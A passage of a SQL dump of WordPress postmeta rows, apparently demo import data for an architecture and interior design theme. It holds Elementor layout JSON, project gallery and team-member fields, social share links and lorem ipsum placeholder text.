unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(2227,4646,'_elementor_page_assets','a:0:{}'),(2228,4646,'_thumbnail_id','1165'),(2229,4646,'_wxr_import_has_attachment_refs','1'),(2230,4647,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(2231,4647,'ova_project_service','Interior design'),(2232,4647,'ova_project_architect','Mike hardson'),(2233,4647,'ova_project_duration','4.5 Months'),(2234,4647,'ova_project_location','Broklyn, New York'),(2235,4647,'_elementor_edit_mode','builder'),(2236,4647,'_elementor_template_type','wp-post'),(2237,4647,'_elementor_version','3.6.6'),(2238,4647,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:91:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/greater-commercial/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:98:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/greater-commercial/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:106:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/greater-commercial/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:92:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/greater-commercial/\";}}'),(2239,4647,'_wp_page_template','default'),(2240,4647,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Greater commercial\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(2241,4647,'_elementor_page_assets','a:0:{}'),(2242,4647,'_thumbnail_id','1167'),(2243,4647,'_wxr_import_has_attachment_refs','1'),(2284,4652,'ova_team_met_avatar_id','926'),(2285,4652,'ova_team_met_avatar','https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg'),(2286,4652,'ova_team_met_job','Architecture'),(2287,4652,'ova_team_met_group_icon','a:4:{i:0;a:2:{s:30:\"ova_team_met_class_icon_social\";s:14:\"fab fa-twitter\";s:24:\"ova_team_met_link_social\";s:20:\"https://twitter.com/\";}i:1;a:2:{s:30:\"ova_team_met_class_icon_social\";s:15:\"fab fa-facebook\";s:24:\"ova_team_met_link_social\";s:41:\"https://www.facebook.com/ovatheme.envato/\";}i:2;a:2:{s:30:\"ova_team_met_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:24:\"ova_team_met_link_social\";s:26:\"https://www.pinterest.com/\";}i:3;a:2:{s:30:\"ova_team_met_class_icon_social\";s:16:\"fab fa-instagram\";s:24:\"ova_team_met_link_social\";s:26:\"https://www.instagram.com/\";}}'),(2288,4652,'ova_team_met_slogans','<h3>I help my clients stand out and they help me grow.</h3>\r\n<p>Lorem ipsum dolor sit amet, con adipiscing elit tiam convallis elit id impedie. Quisq commodo simply free ornare tortor.</p>\r\n\r\n<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden in the middle of text.</p>'),(2289,4652,'ova_team_met_order_team','1'),(2290,4652,'_elementor_edit_mode','builder'),(2291,4652,'_elementor_template_type','wp-post'),(2292,4652,'_elementor_version','3.6.6'),(2293,4652,'_wp_page_template','default'),(2294,4652,'_elementor_data','[{\"id\":\"fdf95b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c1adc30\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":40,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"88add9e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Personal experience\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ffc3307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"90f1ef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"349a0b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"f0b4c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"7ef98be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Interior\",\"percent\":{\"unit\":\"%\",\"size\":40,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"72b6bee\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-3.jpg\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"e8692ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"645829f\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_3\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"6030bc4\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"c9dec93\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"7512efb\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"}}],\"dot_control\":\"\",\"content_color\":\"#FFFFFF\",\"author_name_color\":\"#FFFFFF\",\"content_testimonial_typography_typography\":\"custom\",\"content_testimonial_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"content_testimonial_typography_font_weight\":\"500\",\"content_testimonial_typography_line_height\":{\"unit\":\"em\",\"size\":1.6,\"sizes\":[]},\"author_name_typography_typography\":\"custom\",\"author_name_typography_font_weight\":\"800\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"job_typography_font_weight\":\"700\",\"job_typography_text_transform\":\"uppercase\",\"job_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"job_color\":\"#E3B25A\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"background_item_padding_mobile\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"5c64a4f\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8a92eb0\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"78a7995\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"253227a\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9838c98\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"02e7bd7\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}}],\"author_name_typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27c1be6\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d2671f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"a61f2bd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-planning-stage.jpg\",\"id\":2348,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91355df\",\"elType\":\"widget\",\"settings\":{\"title\":\"Planning stage\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e06b4f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f2bb79e\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"49ac777\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"7a518f5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-flexible-output.jpg\",\"id\":2346,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"21dc602\",\"elType\":\"widget\",\"settings\":{\"title\":\"Flexible output\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dab0350\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"06b4b1f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Complete italian wooden works\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas 